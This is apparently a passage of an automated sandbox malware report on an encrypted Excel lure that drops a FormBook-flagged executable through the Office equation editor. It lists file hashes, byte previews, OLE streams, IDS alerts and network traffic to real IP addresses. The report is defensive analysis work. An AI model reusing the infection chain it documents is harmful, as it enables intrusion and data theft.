                                  Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A83AF197.jpeg
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                  Category:dropped
                                  Size (bytes):8815
                                  Entropy (8bit):7.944898651451431
                                  Encrypted:false
                                  SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                  MD5:F06432656347B7042C803FE58F4043E1
                                  SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                  SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                  SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                  Malicious:false
                                  Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AA45CD69.emf
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                  Category:dropped
                                  Size (bytes):7608
                                  Entropy (8bit):5.091127811854214
                                  Encrypted:false
                                  SSDEEP:96:+SDjyLSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5Djr+sW31RGtdVDYM3VfmkpH
                                  MD5:EB06F07412A815AED391F20298C1087B
                                  SHA1:AC0601FFC173F50B56C3AE2265C61B76711FBE01
                                  SHA-256:5CA81C391E8CA113254221D535BE4E0677908DA61DE0016EC963DD443F535FDE
                                  SHA-512:38AEF603FAC0AB6FB7159EBA5B48BD7E191A433739710AEACB11538E51ADA5E99CD724BE5B3886986FCBB02375B0C132B0C303AE8838602BCE88475DDD727A49
                                  Malicious:false
                                  Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I....................................................v.Ze..............%f^..................Y...Y.'.wq....\.....Y.......Y.@.Y.W.wq......Y..6.v_.wq......wq.Ze.4.g^..Y...f^0.g^......g^..f^........4.g^@.Y...f^......f^..........g^..Y.......g^4tf^..g^............<..u.Z.v.....Ze......Ze........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DBF7BC5F.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):84203
                                  Entropy (8bit):7.979766688932294
                                  Encrypted:false
                                  SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                  MD5:208FD40D2F72D9AED77A86A44782E9E2
                                  SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                  SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                  SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                  Malicious:false
                                  Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EFA7786E.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                                  Category:dropped
                                  Size (bytes):50311
                                  Entropy (8bit):7.960958863022709
                                  Encrypted:false
                                  SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                                  MD5:4141C7515CE64FED13BE6D2BA33299AA
                                  SHA1:B290F533537A734B7030CE1269AC8C5398754194
                                  SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                                  SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                                  Malicious:false
                                  Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F152D108.emf
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                  Category:dropped
                                  Size (bytes):648132
                                  Entropy (8bit):2.8124530118203914
                                  Encrypted:false
                                  SSDEEP:3072:134UL0tS6WB0JOqFB5AEA7rgXuzqr8nG/qc+L+:l4UcLe0JOcXuurhqcJ
                                  MD5:955A9E08DFD3A0E31C7BCF66F9519FFC
                                  SHA1:F677467423105ACF39B76CB366F08152527052B3
                                  SHA-256:08A70584E1492DA4EC8557567B12F3EA3C375DAD72EC15226CAFB857527E86A5
                                  SHA-512:39A2A0C062DEB58768083A946B8BCE0E46FDB2F9DDFB487FE9C544792E50FEBB45CEEE37627AA0B6FEC1053AB48841219E12B7E4B97C51F6A4FD308B52555688
                                  Malicious:false
                                  Preview: ....l...........................Q>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................V$.....o..f.V.@o.%.....o...o.....L.o...o.RQAXL.o.D.o.......o.0.o.$QAXL.o.D.o. ...Id.VD.o.L.o. ............d.V........................................%...X...%...7...................{$..................C.a.l.i.b.r.i.............o.X...D.o.x.o..8.V........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F1699B60.png
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                  Category:dropped
                                  Size (bytes):49744
                                  Entropy (8bit):7.99056926749243
                                  Encrypted:true
                                  SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                  MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                  SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                  SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                  SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                  Malicious:false
                                  Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FC1EE4C5.jpeg
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                  Category:dropped
                                  Size (bytes):8815
                                  Entropy (8bit):7.944898651451431
                                  Encrypted:false
                                  SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                  MD5:F06432656347B7042C803FE58F4043E1
                                  SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                  SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                  SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                  Malicious:false
                                  Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                  C:\Users\user\Desktop\~$Letter 1019.xlsx
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):330
                                  Entropy (8bit):1.4377382811115937
                                  Encrypted:false
                                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                  Malicious:true
                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  C:\Users\Public\vbc.exe
                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):993792
                                  Entropy (8bit):7.859694041798628
                                  Encrypted:false
                                  SSDEEP:24576:vo2y0RBSy/DrDoqbg1L+8XAaIXqziNeBUdt:vXNzrrDoeg1qYBIOiwBU
                                  MD5:15D907E7D9F8286E5053796C9D78FCEC
                                  SHA1:B7D7329E94E2292ED53E2778CEBEC533AC599030
                                  SHA-256:771E4F69520F71AFE6A6E9A4EB4DE7DCD8D7521D90DB290CA6C27B1A95C532AF
                                  SHA-512:C11D01A61F3DAB5923CC7C2A64EAE2732B5633376D3EF3F9FDF6A0E59567226ECA74B84E4CAD49DA87F6538B6C42C7F7A98A552C12E7B0917E6FF5F81D09F02E
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 15%
                                  Joe Sandbox View:
                                  • Filename: Letter 09JUN 2021.xlsx, Detection: malicious, Browse
                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[..`..............P..............=... ...@....@.. ....................................@..................................<..O....@.......................`.......;............................................... ............... ..H............text... .... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......(..............@..B.................<......H........T..............pX.. ............................................0............(!...(".........(.....o#....*.....................($......(%......(&......('......((....*N..(....o....()....*&..(*....*.s+........s,........s-........s.........s/........*....0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0...........~....o3....+..*.0...........~....o4....+..*&..(5....*...0..<........~.....(6.....,!r...p.....(7...o8...s9............~.....

                                  Static File Info

                                  General

                                  File type:CDFV2 Encrypted
                                  Entropy (8bit):7.995656685932539
                                  TrID:
                                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                  File name:Letter 1019.xlsx
                                  File size:1297920
                                  MD5:e781a9517fe291b2c42878ac9c68d70c
                                  SHA1:01e1b2d2df156dfe65bca40f264c71bcee9fa592
                                  SHA256:2d4f498ee8c41344e6bab8d1d638d48a62672c5cb6ee67afdd5e3333d892715e
                                  SHA512:7cd525b24a81266760957dce9c2785450996127f725e51025157e84690f6e3fc740619c59023ebf6155712a0cf1ebdf3c18d44301aa9d06ccd2a2bcb353a57c8
                                  SSDEEP:24576:xhd1FE2xOPmTXXt2JvlMYWZWh4RBJyGpEh1TSeoyI8yfTaVP8OoFhcjBc:xhZEKOuDX8nRHh4RB03G8ETOPic+
                                  File Content Preview:........................>.......................................................................................................|.......~...............z......................................................................................................

                                  File Icon

                                  Icon Hash:e4e2aa8aa4b4bcb4

                                  Static OLE Info

                                  General

                                  Document Type:OLE
                                  Number of OLE Files:1

                                  OLE File "Letter 1019.xlsx"

                                  Indicators

                                  Has Summary Info:False
                                  Application Name:unknown
                                  Encrypted Document:True
                                  Contains Word Document Stream:False
                                  Contains Workbook/Book Stream:False
                                  Contains PowerPoint Document Stream:False
                                  Contains Visio Document Stream:False
                                  Contains ObjectPool Stream:
                                  Flash Objects Count:
                                  Contains VBA Macros:False

                                  Streams

                                  Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                  General
                                  Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                  File Type:data
                                  Stream Size:64
                                  Entropy:2.73637206947
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                  Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                  Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                  General
                                  Stream Path:\x6DataSpaces/DataSpaceMap
                                  File Type:data
                                  Stream Size:112
                                  Entropy:2.7597816111
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                  Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                  Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                  General
                                  Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                  File Type:data
                                  Stream Size:200
                                  Entropy:3.13335930328
                                  Base64 Encoded:False
                                  Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                  Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                  General
                                  Stream Path:\x6DataSpaces/Version
                                  File Type:data
                                  Stream Size:76
                                  Entropy:2.79079600998
                                  Base64 Encoded:False
                                  Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                  Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                  Stream Path: EncryptedPackage, File Type: data, Stream Size: 1283656
                                  General
                                  Stream Path:EncryptedPackage
                                  File Type:data
                                  Stream Size:1283656
                                  Entropy:7.99984183654
                                  Base64 Encoded:True
                                  Data ASCII:> . . . . . . . . h : . . . A . . . . . . . . . . G . . W . . . 7 9 . . . ) ? . . . . . R . . . . X . . . . . L 3 y Y . . . { . 6 q . M . . . . a . j . 4 . J . . . F q . . . } a . j . 4 . J . . . F q . . . } a . j . 4 . J . . . F q . . . } a . j . 4 . J . . . F q . . . } a . j . 4 . J . . . F q . . . } a . j . 4 . J . . . F q . . . } a . j . 4 . J . . . F q . . . } a . j . 4 . J . . . F q . . . } a . j . 4 . J . . . F q . . . } a . j . 4 . J . . . F q . . . } a . j . 4 . J . . . F q . . . } a . j . 4 . J .
                                  Data Raw:3e 96 13 00 00 00 00 00 12 68 3a 94 bf 09 41 b5 b3 f0 d3 ca b9 93 1c c5 f1 47 8b bc 57 df bc b6 37 39 f0 8d 80 29 3f a5 01 86 a5 ea 52 b6 e8 ca cc 58 e9 e0 0b e5 aa 4c 33 79 59 e8 05 b4 7b 83 36 71 f9 4d f6 81 1d d5 61 f2 6a d3 34 01 4a d5 a3 a0 46 71 89 81 d9 7d 61 f2 6a d3 34 01 4a d5 a3 a0 46 71 89 81 d9 7d 61 f2 6a d3 34 01 4a d5 a3 a0 46 71 89 81 d9 7d 61 f2 6a d3 34 01 4a d5
                                  Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                  General
                                  Stream Path:EncryptionInfo
                                  File Type:data
                                  Stream Size:224
                                  Entropy:4.51925233254
                                  Base64 Encoded:False
                                  Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . g . . . . . M . . . . . ~ F 7 P . . . . . g . . . v . . . / . . . . . e . . . F ~ < . . . . e . . . . . ` Y . . . 8 | 5 . . . . . . .
                                  Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                  Network Behavior

                                  Snort IDS Alerts

                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                  06/10/21-15:24:50.574428TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916580192.168.2.2218.140.1.169
                                  06/10/21-15:26:08.719492TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22172.67.161.4
                                  06/10/21-15:26:08.719492TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22172.67.161.4
                                  06/10/21-15:26:08.719492TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22172.67.161.4
                                  06/10/21-15:26:27.789880TCP1201ATTACK-RESPONSES 403 Forbidden804916899.83.154.118192.168.2.22

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jun 10, 2021 15:24:50.388992071 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:50.573940992 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.574023962 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:50.574428082 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:50.760368109 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.760406017 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.760427952 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.760449886 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.760472059 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.760493994 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.760515928 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.760539055 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.760557890 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:50.760562897 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.760586023 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.760591984 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:50.760600090 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:50.760603905 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:50.760607004 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:50.760627985 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:50.771881104 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:50.946381092 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.946418047 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.946435928 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.946458101 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.946484089 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.946507931 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.946527958 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.946551085 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.946569920 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.946579933 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:50.946588993 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.946610928 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.946615934 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:50.946626902 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:50.946631908 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:50.946631908 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:50.946634054 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:50.946650028 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:50.946661949 CEST804916518.140.1.169192.168.2.22
